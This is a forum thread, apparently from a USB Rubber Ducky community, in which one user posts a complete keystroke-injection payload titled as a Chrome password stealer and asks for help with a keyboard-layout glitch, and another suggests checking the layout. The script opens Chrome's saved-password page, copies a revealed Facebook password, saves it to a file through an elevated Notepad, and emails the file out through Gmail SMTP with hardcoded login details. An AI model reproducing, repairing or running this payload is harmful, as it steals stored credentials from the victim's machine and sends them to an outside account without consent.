ahedhli Posted May 10, 2019 Share Posted May 10, 2019 I'm running this payload code but it appears that powershell not reading the email correctly. Instead reading it akh00157@gmail.com it changed to akh00157"gmail.com REM Author: Nuk3leus REM Ducky chrome password stealer: 1.0 REM Target: Windows 7 REM Description: Opens chrome, navigates to chrome settings, navigates to saved passwords, searches for facebook, shows password, copys password REM closes chrome, Opens notepad with bypass uac so it can save to C:\ drive and pastes in password REM saves to C:\passwords.txt folder, closes notepad REM sends files via gmail to account. DELAY 2000 REM -------------open chrome GUI r DELAY 1000 STRING chrome DELAY 1000 ENTER DELAY 4000 REM -------------copy plaintext password STRING chrome://settings/passwords ENTER DELAY 2000 STRING facebook DELAY 500 TAB DELAY 500 DOWN DELAY 500 TAB DELAY 500 TAB DELAY 500 ENTER DELAY 500 ALT D DELAY 500 TAB DELAY 500 TAB DELAY 500 TAB DELAY 500 CTRL C DELAY 500 ALT F4 DELAY 500 REM -------------save file to music folder as passwords.txt GUI R DELAY 500 STRING powershell start-process notepad.exe -Verb runAs DELAY 500 ENTER DELAY 2000 ALT y DELAY 1000 CTRL V DELAY 500 ALT f DELAY 500 STRING s DELAY 500 STRING passwords.txt DELAY 500 TAB TAB TAB TAB TAB TAB TAB TAB TAB STRING c DELAY 1000 STRING l DELAY 500 ENTER DELAY 500 ALT S DELAY 1000 ALT F4 DELAY 500 REM -------------email log via gmail GUI r DELAY 500 STRING powershell ENTER DELAY 1000 STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('akh001576@gmail.com', 'test1992'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'akh001576@gmail.com' ENTER STRING $ReportEmail.To.Add('************') ENTER STRING $ReportEmail.Subject = 'Ducky chrome passwords' ENTER STRING $ReportEmail.Body = 'Attached is your list of passwords.' ENTER STRING $ReportEmail.Attachments.Add('c:\passwords.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 3000 STRING exit ENTER Link to comment Share on other sites More sharing options...
kuyaya Posted November 26, 2019 Share Posted November 26, 2019 have you checked the keyboard layout? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.